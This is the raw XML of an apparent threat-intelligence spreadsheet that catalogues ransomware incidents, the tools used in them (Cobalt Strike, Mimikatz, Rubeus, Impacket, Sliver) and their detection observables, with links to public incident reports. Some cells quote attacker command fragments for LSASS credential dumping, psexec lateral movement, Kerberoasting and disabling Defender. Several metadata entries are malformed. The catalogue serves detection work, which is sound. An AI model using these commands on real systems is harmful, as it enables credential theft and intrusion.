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7CCED973-E9BD-0A4A-91D6-D09242DB0E71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4" r:id="rId12"/>
    <pivotCache cacheId="5" r:id="rId13"/>
    <pivotCache cacheId="6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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="7026" uniqueCount="3144">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "date": "2024-09", "url": "https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/", "tags": ["blackcat", "alphv"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2024-06", "url": "https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/", "tags": ["blackcat", "alphv"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2025-03", "url": "hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/", "tags": ["BlackSuit"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2024-08", "url": "https://thedfirreport.com/2024/08/26/blacksuit-ransomware/", "tags": ["BlackSuit"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2022-03-17", "url": "https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/", "tags": ["blackmatter", "blackcat"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2022-06-22", "url": "https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/", "tags": ["alphv", "blackcat"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2023-01012", "url": "https://www.hhs.gov/sites/default/files/royal-blackcat-ransomware-tlpclear.pdf", "tags": ["blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>Mega</t>
  </si>
  <si>
    <t>AnyDesk</t>
  </si>
  <si>
    <t>Plink</t>
  </si>
  <si>
    <t>Ngrok</t>
  </si>
  <si>
    <t>SplashTop</t>
  </si>
  <si>
    <t>Brute Ratel</t>
  </si>
  <si>
    <t>Evilginx2</t>
  </si>
  <si>
    <t>{ "data": "2023-12-19", "url": "https://www.cisa.gov/sites/default/files/2024-03/aa23-353a-stopransomware-alphv-blackcat-update_2.pdf", "tags": ["blackcat", "alphv"]}</t>
  </si>
  <si>
    <t>"Dump using GUI while TA is on RDP
taskmgr
Open taskmgr
Go to process lsass
“Create Dump File”"</t>
  </si>
  <si>
    <t>{  "date": "2021", "url": "https://github.com/DISREL/Conti-Leaked-Playbook-TTPs/blob/main/Conti-Leaked-Playbook-TTPs.pdf", "tags": ["conti"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{"date": "2020-10": "https://thedfirreport.com/2020/10/08/ryuks-return/", "tags": ["ryuk"]}</t>
  </si>
  <si>
    <t>{"date": "2020-10": "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "tags": ["ryuk"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{"date": "2021-01": "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", "tags": ["ryuk"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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>{"date": "2021-05": "https://thedfirreport.com/2021/05/12/conti-ransomware/", "tags": ["conti"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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>{"date": "2021-08": "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", "tags": ["conti"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{"date": "2021-09"url": "https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/", "tags": ["conti"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{"date": "2021-10": "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "tags": ["conti"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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>{"date": "2021-11": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/", "tags": ["ryuk"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{"date": "2022-04"url": "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/", "tags": ["conti"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2022-06", "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", "tags": ["conti", "cl0p", "hive", "ryuk", "lockbit", "blackbyte", "blackcat", "ragnarlocker"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{"date": "2023-11" , "url": "https://www.cisa.gov/sites/default/files/2023-11/aa23-325a_lockbit_3.0_ransomware_affiliates_exploit_cve-2023-4966_citrix_bleed_vulnerability_0.pdf", "tags": ["lockbit"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{"date": "2025-02" , "url": "https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/", "tags": ["lockbit"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2025-03-25", "url": "https://www.cisa.gov/sites/default/files/2025-03/aa25-071a-stopransomware-medusa-ransomware.pdf", "tags": ["medusa"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "date": "2021-05-10", "url": "https://labs.withsecure.com/publications/prelude-to-ransomware-systembc", "malware": "systembc"}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2023-05", "url": "https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection", "tags": ["CACTUS"]}</t>
  </si>
  <si>
    <t>{ "data": "2023-12", "url": "https://www.cisa.gov/sites/default/files/2023-12/aa23-352a-stopransomware-play-ransomware.pdf", "tags": ["Play"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2024-02", "url": "https://www.cisa.gov/sites/default/files/2024-02/aa24-060a-stopransomware-phobos-ransomware_1.pdf", "tags": ["Phobos"]}</t>
  </si>
  <si>
    <t>Passview</t>
  </si>
  <si>
    <t xml:space="preserve">PowerTool </t>
  </si>
  <si>
    <t>Universal Virus Sniffer</t>
  </si>
  <si>
    <t>Bloodhound/Sharphound</t>
  </si>
  <si>
    <t>{ "data": "2024-08-29", "url": "https://www.cisa.gov/sites/default/files/2024-09/aa24-242a-stopransomware-ransomhub-ransomware_1.pdf", "tags": ["RansomHub"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2024-08", "url": "https://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf", "tags": ["Akira"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2024-11", "url": "https://www.cisa.gov/sites/default/files/2024-11/aa23-136a-joint-csa-stopransomware-bianlian-ransomware-group.pdf", "tags": ["bian lian"]}</t>
  </si>
  <si>
    <t>Rsocks SOCKS5</t>
  </si>
  <si>
    <t>Advanced Port Scanner</t>
  </si>
  <si>
    <t>SharpShares</t>
  </si>
  <si>
    <t>PingCastle</t>
  </si>
  <si>
    <t>{ "data": "2024-11", "url": "https://www.cisa.gov/sites/default/files/2024-11/aa24-131a-joint-csa-stopransomware-black-basta_3.pdf", "tags": ["black basta"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2025-02", "url": "https://www.cisa.gov/sites/default/files/2025-02/aa25-050a-stopransomware-ghost-cring-ransomware.pdf", "tags": ["Ghost"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
